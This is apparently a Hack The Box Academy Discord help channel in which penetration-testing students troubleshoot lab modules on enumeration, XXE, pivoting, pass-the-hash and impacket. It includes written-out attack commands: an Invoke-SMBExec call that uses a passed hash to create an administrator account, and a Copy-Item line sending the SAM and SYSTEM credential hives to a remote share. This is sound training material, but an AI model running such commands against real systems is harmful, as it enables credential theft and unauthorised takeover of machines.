this is the weirdest thing I have had to deal with
Note that it didn't even do the "connecting to"...
it really did not
Anyways, I would like to apologize to the mod @autumn pilot for being rude. I know you were trying to be helpful; these kinds of things are just frustrating, and you closed the ticket out of nowhere so I got frustrated. I am sorry for being rude to you
good night yall
thanks to everyone who helped
May God reward you all and bless you abundantly
hello everyone
It's just how authentication is handled with Kerberos. When you specify DC1 you're specifically requesting access through auth protocols to DC1, when you use IP it is using basic authentication
I'm doing the "Working with IDS/IPS" modules and I'm blocked in the "Snort Rule Development" chapter
I checked in the forum for some help: https://forum.hackthebox.com/t/working-with-ids-ips-snort-rule-development/305483
however, it seems I need to do a lot of guessing to find the good keyword.
It's generating a logon failure instead of an audit failure
Instead of going through Kerberos, it's going through NTLM
I understand the key is inside the user agent, but I tried some without success
hi all,
I'm trying to get all domain information from the terminal with bloodhound, but my command doesn't work.
What's the error?
my command
bloodhound-python -d INLANEFREIGHT.LOCAL -u user -p 'password' -c all -dc ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL -ns 10.129.152.122
Traceback (most recent call last):
File "/usr/bin/bloodhound-python", line 33, in <module>
sys.exit(load_entry_point('bloodhound==1.7.2', 'console_scripts', 'bloodhound-python')())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/bloodhound/__init__.py", line 308, in main
ad.dns_resolve(domain=args.domain, options=args)
File "/usr/lib/python3/dist-packages/bloodhound/ad/domain.py", line 698, in dns_resolve
q = self.dnsresolver.query(query, 'SRV', tcp=self.dns_tcp)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/dns/resolver.py", line 1364, in query
return self.resolve(
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/dns/resolver.py", line 1321, in resolve
timeout = self._compute_timeout(start, lifetime, resolution.errors)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/dns/resolver.py", line 1075, in _compute_timeout
raise LifetimeTimeout(timeout=duration, errors=errors)
dns.resolver.LifetimeTimeout: The resolution lifetime expired after 3.105 seconds: Server Do53:10.129.152.122@53 answered The DNS operation timed out.
Do you have MS01 in your hosts file?
10.129.152.122 INLANEFREIGHT.LOCAL
makes sense
thanks for explaining
Read the error message, it says dns timed out
check -h on the relevant arguments to dns
Hey, I solved two questions out of three. I went back to do the updated Information Gathering - Web Edition module stuff that got added. It turns out I was able to solve questions one and three of the Fingerprinting section. The thing is, I need to know why the following is not working
┌─[✗]─[htb-ac-605555@htb-vcrprdkg31]─[~]
└──╼ $curl -I http://10.129.190.67
HTTP/1.1 200 OK
Date: Thu, 27 Jun 2024 21:09:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 16 Aug 2021 18:15:18 GMT
ETag: "b8-5c9b12f02857c"
Accept-Ranges: bytes
Content-Length: 184
Vary: Accept-Encoding
Content-Type: text/html
or this
─[htb-ac-605555@htb-vcrprdkg31]─[~]
└──╼ $nikto -h 10.129.190.67 -Tuning b
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.129.190.67
+ Target Hostname: 10.129.190.67
+ Target Port: 80
+ Start Time: 2024-06-27 16:10:08 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: b8, size: 5c9b12f02857c, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
etc. It will not give me the content management system
and it's not WordPress. I tried curl -I http and curl -I https
are we allowed to ask a question about the Pentesting Exam?
can someone give me a clue as to what I'm doing wrong?
Depends. If it's for someone to help you with the actual exam then no
you can ask, but the responses will depend on what you're asking
Not even gonna waste my time
did you visit the website?
yes
which is http://10.129.190.67
it won't connect to app.inlanefreight.local
I tried app.10.129.190.67 and app.inlanefreight.local
only thing that returns a web page is http://10.129.190.67
and so on and so forth
I tried dirb on it and couldn't find anything
did you add it to your hosts file?
No, how do I do that? Should I just Google it?
If I remember correctly, just have a look at the website and you’ll find the cms.
ok
He didn't add the vhost to the hosts file; this won't help
brother
how many modules in the path have you done
you're taught how to add vhosts from that module iirc
four or five
ok I will look that up then since it sounds like I just need to review it
which module is this
You are right. I wasn’t remembering it well.
it's this
huh
yeah it should teach you then
@quasi wave review this section pls
pls provide the section name instead of number
should be Footpringgle
Figured it
Footpringgle
don't worry i found out what it was
ok nice
nice
Hi. I am reading the Pass The Hash section in Password Attacks. In the subsection "Pass the Hash with Powershell Invoke-TheHash (Windows)" I come across this sentence:
Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer
It's not clear to me why the hash we are passing must have admin rights... Is it just to do with the commands we want to run, i.e. add users into local admin or use a socket to connect back with a reverse shell?
But surely we can just run cmd.exe regardless of whether the hash we authenticate with has admin privs?
You can run cmd as any user, however some commands can only be run as admins
Thx, that's what I figured. The sentence is a little confusing. It seems to imply that you need to have captured the hash of an admin user in order to use the tool on the target. But I'm guessing I can pass it a hash of a normal user as long as I am not trying to run something on the target that requires admin privs
tool in question is Invoke-TheHash
i'll see if i can test
But it also depends on what subprocesses are required
yeah maybe the tcp-connect socket perms
specifically the techniques used in that repo to get shells do require admin
Impersonation shenanigans
generally all the exec methods need admin
Runas (but better)
ok that makes sense
now the sentence makes sense
so the functions used by Invoke-TheHash requires admin privs
thx for clarifying
only the *exec methods
those are used to get a shell
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash <..> -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose
looking at this. Invoke-SMBExec is a function being executed on the client and not the target?
obv. the command "net user... " requires admin privs
The /add part requires admin
Hello, does someone have a moment to tell me why this password is not working? I can screen share if someone doesn't mind. Pillaging chapter in the Windows Priv Esc module
Yeah, that for sure, given it's the admin group
question 5
It's being run on the target ip
but we can replace that with cmd.exe and wonder if it works
“Administrative rights are permissions granted by administrators to users which allow them to create, delete, and modify items and settings"
Found that here, wasn’t clear for me either reading that sentence : https://kb.iu.edu/d/army
On a computer, an administrator is a local account or a
local security group that has complete and unrestricted access to
create, delete, and modify files, f...
Yeah, the command is run on the target machine. Think it's best I play with it
Asking again.
https://academy.hackthebox.com/module/136/section/1291
Try to read the source code of 'upload.php' to identify the uploads directory, and use its name as the answer. (write it exactly as found in the source, without quotes)
Managed to read flag.txt with XXE in svg.
Tried to use XSS in XML to read upload.php
Tried to use XXE to read /var/www/html/upload.php
if you try to curl it do you see source code?
I see the html on the main page.
visiting /upload.php returns "Only SVG images are allowed"
I'm new, so this was the idea I had, but can't really help more than that. Hope you figure it out.
they're asking for a hash, not a password
Bro, did you try to load the page in your browser and right click / view source?
Then upload a "svg" image
But also can you visit upload.php directly?
Yes
I did and then it redirects to home.
Yes, it just returns an error "Only SVG images are allowed"
Can you catch the requests?
maybe this help?
Note this is an ai generated response
So mileage may vary
correct
Hey! Were you able to get any nudges? I'm stuck on the OTP portion right now
Already tried.
Shells and Payloads - Infiltrating Linux: trying to find a way in, --script=vuln threw an RCE for Apache my way, but when loaded in Metasploit it tells me that it's not vulnerable?
You're focusing too wide
you can use xxe to read flag.txt, change it to read the source code
the other payload in the section is useful
focusing too wide?
Yes
I saw that lol
Honestly, no... lol. I've been trying to get into a habit of not using Metasploit for everything and instead looking for what --script=vuln returns as a download, reading through the configuration and using it, as opposed to being a "script kiddie"
but I'll give that a look
Tried to read /var/www/html/upload.php and /var/www/upload.php
Didn't exist
how do you know that that's the full path?
Just relying on nmap --scripts=vuln is also being a script kiddie
why not just use relative path
You need to be able to figure things based on multiple tools as nmap's output even tells you it can be wrong
Going to try that, in the other challenges the flag was usually placed at root so presumed it to be the same
Or it can throw some vuln at you that's entirely unrelated
Oh no, absolutely Marcie, it's just the first step of a mental "process" that I've been trying to get myself into, sort of developing a methodology that works for me and makes sense
Idk if I explained that right though
Things to note: what ports are open. Always start investigating those
80/443? Let's look at it in a browser
full path also works, just tested
usually, I'll do nmap -sCV -T4 <ip> as a base, and then run --script=vuln, if nothing comes back I'll navigate to the website and wappalyze for a version to look up and go from there, guess that's why this one threw me off
@fathom pendant I'm gonna be like you when I finish this course and exam and just help people. I feel like this is a huge way to learn yourself and give nudges to others. You're so helpful
Well it sounds like you didn't even look at the website
Always think: "if it's complicated, is there a simpler way"
I.e. if it's a wide vuln (i.e. apache as a whole) then there must be something simpler
If you see an underlying web service is the vuln thrown back: assume that's not the path forward (unless specifically tomcat, but tomcat is special)
Yeah now it worked.
Probably was doing a stupid mistake at the time like having an extra /.
So I was able to get to where the SAM and SYSTEM files are, but I can't copy them over
Asks for destination
Copy-Item -Path C:\Windows\System32\config -destinaton \\10.10.14.122\fismathack
Your error is saying positional parameter not found
You basically gave it 3 parameters
what should it look like?
Your command here and what you showed are 2 different commands
That was an example; I had to fill in my own info
But destination was in there and I'm not sure what I'm supposed to put
Copy-Item -Path (path to thing you want to copy) -Destination (your remote share)
If you can't see what's different between your command and what's expected take a minute to read
I need some help on the SocksRDP part.
I have the following chain:
me --> pivot1 (win) --> pivot2 (win) --> victim.
I have the SocksRDP DLL running on pivot1, and I'm in pivot2. I need to get SocksRDP-server.exe to this host, but I'm stuck on the best way to transfer it?
Nevermind, I used a base64 string generated in my VM, then copy/pasted it into the RDP session... was one hell of a string given its size lol
I'm very interested in how others do it, as I'm not sure that'd always work (particularly if the clipboard is disabled)
At the risk of sounding dumb, I'm not sure the public exploits intro module works.
But I'm all ears if anyone has ideas.
it works
If someone has done the Broken Auth module skills assessment, can I PLEASE get a nudge? I went through the forums and got a nudge, but I think I am just missing a SMALL piece to get the flag... and this is the LAST skills assessment before I 100 percent the course hehe
Or I'm dumb, idk, take your pick: super close or super dumb. Never really know with these skills assessments 🥲
@dim wolf - Was your "it works" directed at my comment?
Could I dm you quick?
nah i'm doing the exam rn
good luck
I'm still on INFORMATION GATHERING - WEB EDITION Skills Assessment.
I've fuzzed vhosts and found another subdomain and added it to my /etc/hosts file. I've just tried fuzzing both the parent and subdomain to find the hidden admin directory as mentioned in Q3 but I can't find a wordlist that works. I've tried directory-list-2.3-medium.txt which was in the FFUF module, as well as raft-small-directories-lowercase.txt which was mentioned in the old cheat sheet for this module. Does anyone have any suggestions as to a suitable wordlist? I can't see any examples of directory scanning in this module (other than using the Scrapy module which turns up nothing).
oh boy pwnbox is updated
think about robots
But there is no update in my pwn
what question are you asking for?
Q3?
what's going on here??
Yes. I've found that now. Thanks. I only need to answer the final question as this is a re-do with the updated module but trying to work through the full assessment
ah the final question
Don't overcomplicate things; the tool you need is in the module with the suitable wordlist. Enumeration is an iterative process, so you may need to redo the technique to find new things
re-do it from scratch
and since it's meant for future; it'll be in a comment
You can actually cat the JSON file and pipe it to jq: cat results.json | jq -r '.comments'
(jq -r '.key')
smart
ReconSpider (HTB) is a nifty tool
I was doing the assessment from scratch, but I can't enter any answers except for the final one. I'd looked for robots on the parent domain but had forgotten to retry after discovering the subdomain. That HTB ReconSpider (I'd searched online and found another tool of the same name), is going in my toolbox for future crawling.
I know, I was in the same situation
If you can't find the robots.txt in that domain, then you are in the wrong domain (the question guides you to look for robots.txt)
The GH one by the same name is completely different and requires a paid API key from what people have said
that's for Q3
that's for the whole assessment
i mean using robots.txt is pretty standard for most web related hunting anyway
But is there a robots.txt in the other one?
No
That's what stumped me. I'd got that hint and looked on the parent domain. Forgot after I found the subdomain because it had taken some time.
yeah ReconSpider (HTB) makes quick work of crawling it's way through the silly links
👀
If I give HTB money, will the VM performance improve?
Or is it always like using dial-up?
what?
give htb money*
no, all the environments are the same as far as i know
so its always this slow?
i haven't really experienced that so not sure what you're talking about
i've seen services down once in a while, but nothing i would consider slow for what it is
what module are you working on?
There's a noticeable 1-2 second lag between key presses.
oh yeah i don't have that idk
I just started. The public exploit one.
Yeah, sorry, it's called 'public exploits'
that is not a module on the academy platform
this channel is for academy, are you talking about a box on the other platform?
module/77/section/843 in the academy
you should just link it or say the actual name of it
i have no idea what module that points to
are you referring to the Getting Started Module; Section Public Exploits
^^
how long did you wait before trying to connect?
idk. I didn't pay attention.
it can take ~3-5 mins for the environment to fully spawn, and sometimes more i think depending on the module and how big the env is.
its up and running. just terrible lag
you can try changing regions maybe
but, from the instance url, looks like im proxying through uk cloud instance
changing pwnbox regions can have an impact on your perceived performance
the pwnbox region will display estimated latency in ms next to its location
I don't see a way to change regions
fml. disregard
ty.
From a UX/UI perspective, I'd move these things closer together.
but... i know now.
well there's 2 things, vpn region and pwnbox region
they are separate things
you can also just use your own vm (if you have the resources) you can install parrot with as little as 5GB RAM
can I use kali? have that already in a vm.
Yep
you just need to download and run the ovpn file (for the modules that require it); if the module is a public_ip:port, it doesn't require it
You only need to run the OpenVPN file once per session. You don't need to run it for every module, and you can reuse it until you change regions due to some issues
fixed it my VM was just out of date
https://github.com/fortra/impacket/blob/master/examples/mssqlclient.py is this the same mssqlclient as the one that is included with parrot os?
yes it's the impacket one
ty
In the module the command needs to be changed to this:
for ((i = 0; i < ${#hexRandom}; i+= 2)); do echo -n "0x${hexRandom:$i:2},"; done | sed 's/.$//'; echo
It was also missing the ";" before the "do echo"
put it in #1234357888114364508 ¯\_(ツ)_/¯
Oh, is that what that channel is for? I mostly put it in here just in case someone gets confused and they search it in Discord
If it's in erratum academy staff can see and fix it so it doesn't get drowned out
In the Footprinting module MSSQL section, I connected to the server with the provided credentials, but when I try to enumerate the databases with enum_db I just get an empty output and return to the prompt. Is this normal or a technical issue I have to figure out? This is using mssqlclient.py and I did install requirements.txt
Once a foothold is gained during an assessment, it may be in scope to move laterally and vertically within a target network. Using one compromised machine to access another is called pivoting and allows us to access networks and resources that are not directly accessible to us through the compromised host. Port forwarding accepts the traffic on ...
Now for AD Enum & Attacks.... 7 days for that module.... damn
mssqlclient should already be installed if you're using the pwnbox
if it's behaving weirdly try sudo pip install impacket --reinstall --break-system-packages
I am running it on another distro, maybe 'cause it's in a venv. I tried running that command but it's not recognizing the syntax. Definitely seems like a me problem; gonna keep trying to figure it out. As long as I know it's a technical issue I'm cool with debugging
is your venv running a different python version?
Python 3.12.3
Hello everyone
Hello everyone!
I have the exact same problem, wtf
reinstall impacket?
already did
same
academy low key pissing me off with all these little issues
Also, you can do pip install impacket instead of installing from the repo
I have used pip and grabbed the Python version from GitHub
I did that and even recreated a whole new venv
I followed the instructions from impacket readme, hard to go wrong
works on my machine
alright will keep working on it
curious that we have the exact same issue, wonder why
if it is it's an odd problem, but not unheard of ¯\_(ツ)_/¯
same version of impacket, trying your exact version of python now
aye it should be backward compatible
python isn't always backwards compatible
spent an hour thinking i was an idiot
even between same major versions
something that works in 3.11.x might not work in 3.12.x
strange
when you try to run enum_users does it crash?
yes
sudo pip uninstall impacket
sudo pip install impacket ?
It's a weird issue though, and I can't replicate it on either pwnbox (which has its own issues) or my own VM
are you running kali?
/lib/python3.12/site-packages/impacket/tds.py is the precise file that crashes
printColumnsHeader is the function
sudo pip uninstall impacket
i tried a completely fresh virtual environment and same
works after a reinstall🤦♂️
wtf?
but didnt work in a virtual env
wonder if somehow switching to that specific version of python and reinstalling fixed it
well if it's a base problem it's likely something up with the base pip environment
when you use a venv it defaults to basically copying your current pyenv
noted, i need a coffee for this
when you uninstall then reinstall it basically calls to redownload the files
Maybe use pipx?
no idea, too much of a headache to figure it out lol
cpts gonna take a year at this rate
How can I get permission to msg general?
I wish going through the Pentester path wasn't required to take the test
I think that's why impacket is already installed on Parrot and Kali; it might be in the repos? I would have to check that...
I used the latest from python script from github though
read and follow #welcome
i believe there is a version you can download via apt
and you backgrounded the session, not closed it
Maybe latest is not always best ? I see impacket 0.12 dev. It doesn’t feel like it is quite a finished product : )
correct
hence the session still being available